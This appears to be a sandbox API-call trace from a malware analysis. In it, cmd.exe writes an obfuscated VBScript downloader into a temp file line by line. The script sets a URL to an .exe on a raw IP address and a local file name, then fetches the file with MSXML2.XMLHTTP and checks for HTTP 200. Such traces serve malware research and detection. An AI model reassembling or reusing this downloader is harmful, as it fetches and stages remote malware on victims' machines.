[0083.908] ReadFile (in: hFile=0x1c, lpBuffer=0x39f528, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39f524, lpOverlapped=0x0 | out: lpBuffer=0x39f528*, lpNumberOfBytesRead=0x39f524*=0x1, lpOverlapped=0x0) returned 1
[0083.908] GetConsoleTitleW (in: lpConsoleTitle=0x39f348, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.909] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39f310 | out: _Buffer="Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w \r\n") returned 44
[0083.909] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.909] GetFileType (hFile=0x1c) returned 0x1
[0083.909] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.909] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w \r\n", lpUsedDefaultChar=0x0) returned 45
[0083.909] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x39f2fc, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39f2fc*=0x2c, lpOverlapped=0x0) returned 1
[0083.909] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.910] _close (_FileHandle=3) returned 0
[0083.910] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.910] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.910] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.910] GetFileType (hFile=0x7) returned 0x2
[0083.910] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.910] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f484 | out: lpMode=0x39f484) returned 1
[0083.910] _dup (_FileHandle=1) returned 3
[0083.911] _close (_FileHandle=1) returned 0
[0083.911] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.911] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39f454, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.911] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.911] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.911] GetFileType (hFile=0x1c) returned 0x1
[0083.911] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xaa
[0083.911] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39f46c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39f46c*=0) returned 0xa9
[0083.911] ReadFile (in: hFile=0x1c, lpBuffer=0x39f464, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39f460, lpOverlapped=0x0 | out: lpBuffer=0x39f464*, lpNumberOfBytesRead=0x39f460*=0x1, lpOverlapped=0x0) returned 1
[0083.911] GetConsoleTitleW (in: lpConsoleTitle=0x39f284, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.912] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39f24c | out: _Buffer="Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e \r\n") returned 35
[0083.912] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.912] GetFileType (hFile=0x1c) returned 0x1
[0083.912] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.912] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e \r\n", lpUsedDefaultChar=0x0) returned 36
[0083.912] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x39f238, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39f238*=0x23, lpOverlapped=0x0) returned 1
[0083.912] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.912] _close (_FileHandle=3) returned 0
[0083.913] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.913] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.913] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.913] GetFileType (hFile=0x7) returned 0x2
[0083.913] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.913] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f3c0 | out: lpMode=0x39f3c0) returned 1
[0083.913] _dup (_FileHandle=1) returned 3
[0083.913] _close (_FileHandle=1) returned 0
[0083.914] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.914] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39f390, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.914] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.914] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.914] GetFileType (hFile=0x1c) returned 0x1
[0083.914] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcd
[0083.914] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39f3a8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39f3a8*=0) returned 0xcc
[0083.914] ReadFile (in: hFile=0x1c, lpBuffer=0x39f3a0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39f39c, lpOverlapped=0x0 | out: lpBuffer=0x39f3a0*, lpNumberOfBytesRead=0x39f39c*=0x1, lpOverlapped=0x0) returned 1
[0083.914] GetConsoleTitleW (in: lpConsoleTitle=0x39f1c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.915] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39f188 | out: _Buffer="Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i \r\n") returned 68
[0083.915] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.915] GetFileType (hFile=0x1c) returned 0x1
[0083.915] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.915] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i \r\n", lpUsedDefaultChar=0x0) returned 69
[0083.915] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x39f174, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39f174*=0x44, lpOverlapped=0x0) returned 1
[0083.915] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.915] _close (_FileHandle=3) returned 0
[0083.916] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.916] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.916] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.916] GetFileType (hFile=0x7) returned 0x2
[0083.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f2fc | out: lpMode=0x39f2fc) returned 1
[0083.916] _dup (_FileHandle=1) returned 3
[0083.916] _close (_FileHandle=1) returned 0
[0083.917] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.917] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39f2cc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.917] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.917] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.917] GetFileType (hFile=0x1c) returned 0x1
[0083.917] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x111
[0083.917] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39f2e4*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39f2e4*=0) returned 0x110
[0083.917] ReadFile (in: hFile=0x1c, lpBuffer=0x39f2dc, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39f2d8, lpOverlapped=0x0 | out: lpBuffer=0x39f2dc*, lpNumberOfBytesRead=0x39f2d8*=0x1, lpOverlapped=0x0) returned 1
[0083.917] GetConsoleTitleW (in: lpConsoleTitle=0x39f0fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.918] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39f0c4 | out: _Buffer="X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" \r\n") returned 96
[0083.918] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.918] GetFileType (hFile=0x1c) returned 0x1
[0083.918] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.918] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" \r\n", lpUsedDefaultChar=0x0) returned 97
[0083.918] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x39f0b0, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39f0b0*=0x60, lpOverlapped=0x0) returned 1
[0083.918] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.918] _close (_FileHandle=3) returned 0
[0083.918] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.918] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.919] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.919] GetFileType (hFile=0x7) returned 0x2
[0083.919] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.919] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f238 | out: lpMode=0x39f238) returned 1
[0083.919] _dup (_FileHandle=1) returned 3
[0083.919] _close (_FileHandle=1) returned 0
[0083.919] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.919] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39f208, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.920] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.920] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.920] GetFileType (hFile=0x1c) returned 0x1
[0083.920] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x171
[0083.920] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39f220*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39f220*=0) returned 0x170
[0083.920] ReadFile (in: hFile=0x1c, lpBuffer=0x39f218, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39f214, lpOverlapped=0x0 | out: lpBuffer=0x39f218*, lpNumberOfBytesRead=0x39f214*=0x1, lpOverlapped=0x0) returned 1
[0083.920] GetConsoleTitleW (in: lpConsoleTitle=0x39f038, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.920] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39f000 | out: _Buffer="R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" \r\n") returned 55
[0083.920] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.920] GetFileType (hFile=0x1c) returned 0x1
[0083.920] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.920] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" \r\n", lpUsedDefaultChar=0x0) returned 56
[0083.920] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x39efec, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39efec*=0x37, lpOverlapped=0x0) returned 1
[0083.920] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.921] _close (_FileHandle=3) returned 0
[0083.921] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.921] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.921] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.921] GetFileType (hFile=0x7) returned 0x2
[0083.921] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.921] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f174 | out: lpMode=0x39f174) returned 1
[0083.922] _dup (_FileHandle=1) returned 3
[0083.922] _close (_FileHandle=1) returned 0
[0083.922] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.922] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39f144, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.922] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.922] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.922] GetFileType (hFile=0x1c) returned 0x1
[0083.922] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a8
[0083.922] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39f15c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39f15c*=0) returned 0x1a7
[0083.922] ReadFile (in: hFile=0x1c, lpBuffer=0x39f154, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39f150, lpOverlapped=0x0 | out: lpBuffer=0x39f154*, lpNumberOfBytesRead=0x39f150*=0x1, lpOverlapped=0x0) returned 1
[0083.923] GetConsoleTitleW (in: lpConsoleTitle=0x39ef74, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.923] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39ef3c | out: _Buffer="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") \r\n") returned 68
[0083.923] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.923] GetFileType (hFile=0x1c) returned 0x1
[0083.923] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.923] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") \r\n", lpUsedDefaultChar=0x0) returned 69
[0083.923] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x39ef28, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39ef28*=0x44, lpOverlapped=0x0) returned 1
[0083.923] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.924] _close (_FileHandle=3) returned 0
[0083.924] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.924] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.924] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.924] GetFileType (hFile=0x7) returned 0x2
[0083.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f0b0 | out: lpMode=0x39f0b0) returned 1
[0083.925] _dup (_FileHandle=1) returned 3
[0083.925] _close (_FileHandle=1) returned 0
[0083.925] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.925] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39f080, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.925] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.925] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.925] GetFileType (hFile=0x1c) returned 0x1
[0083.925] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ec
[0083.925] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39f098*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39f098*=0) returned 0x1eb
[0083.926] ReadFile (in: hFile=0x1c, lpBuffer=0x39f090, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39f08c, lpOverlapped=0x0 | out: lpBuffer=0x39f090*, lpNumberOfBytesRead=0x39f08c*=0x1, lpOverlapped=0x0) returned 1
[0083.926] GetConsoleTitleW (in: lpConsoleTitle=0x39eeb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.926] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39ee78 | out: _Buffer="B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False \r\n") returned 96
[0083.926] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.926] GetFileType (hFile=0x1c) returned 0x1
[0083.926] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.926] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False \r\n", lpUsedDefaultChar=0x0) returned 97
[0083.926] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x39ee64, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39ee64*=0x60, lpOverlapped=0x0) returned 1
[0083.926] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.927] _close (_FileHandle=3) returned 0
[0083.927] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.927] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.927] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.927] GetFileType (hFile=0x7) returned 0x2
[0083.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.927] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39efec | out: lpMode=0x39efec) returned 1
[0083.928] _dup (_FileHandle=1) returned 3
[0083.928] _close (_FileHandle=1) returned 0
[0083.928] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.928] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.928] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.928] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.928] GetFileType (hFile=0x1c) returned 0x1
[0083.928] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24c
[0083.928] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39efd4*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39efd4*=0) returned 0x24b
[0083.928] ReadFile (in: hFile=0x1c, lpBuffer=0x39efcc, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39efc8, lpOverlapped=0x0 | out: lpBuffer=0x39efcc*, lpNumberOfBytesRead=0x39efc8*=0x1, lpOverlapped=0x0) returned 1
[0083.928] GetConsoleTitleW (in: lpConsoleTitle=0x39edec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.929] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39edb4 | out: _Buffer="B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") \r\n") returned 41
[0083.929] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.929] GetFileType (hFile=0x1c) returned 0x1
[0083.929] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.929] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") \r\n", lpUsedDefaultChar=0x0) returned 42
[0083.929] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x39eda0, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39eda0*=0x29, lpOverlapped=0x0) returned 1
[0083.929] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.930] _close (_FileHandle=3) returned 0
[0083.930] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.930] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.930] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.930] GetFileType (hFile=0x7) returned 0x2
[0083.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39ef28 | out: lpMode=0x39ef28) returned 1
[0083.930] _dup (_FileHandle=1) returned 3
[0083.930] _close (_FileHandle=1) returned 0
[0083.931] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.931] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.931] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.931] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.931] GetFileType (hFile=0x1c) returned 0x1
[0083.931] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x275
[0083.931] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39ef10*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39ef10*=0) returned 0x274
[0083.931] ReadFile (in: hFile=0x1c, lpBuffer=0x39ef08, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39ef04, lpOverlapped=0x0 | out: lpBuffer=0x39ef08*, lpNumberOfBytesRead=0x39ef04*=0x1, lpOverlapped=0x0) returned 1
[0083.931] GetConsoleTitleW (in: lpConsoleTitle=0x39ed28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.932] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39ecf0 | out: _Buffer="If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then \r\n") returned 52
[0083.932] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.932] GetFileType (hFile=0x1c) returned 0x1
[0083.932] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.932] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then \r\n", lpUsedDefaultChar=0x0) returned 53
[0083.932] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x39ecdc, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39ecdc*=0x34, lpOverlapped=0x0) returned 1
[0083.932] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.933] _close (_FileHandle=3) returned 0
[0083.933] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.933] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.933] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.933] GetFileType (hFile=0x7) returned 0x2
[0083.933] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.933] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39ee64 | out: lpMode=0x39ee64) returned 1
[0083.933] _dup (_FileHandle=1) returned 3
[0083.934] _close (_FileHandle=1) returned 0
[0083.934] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.934] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39ee34, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
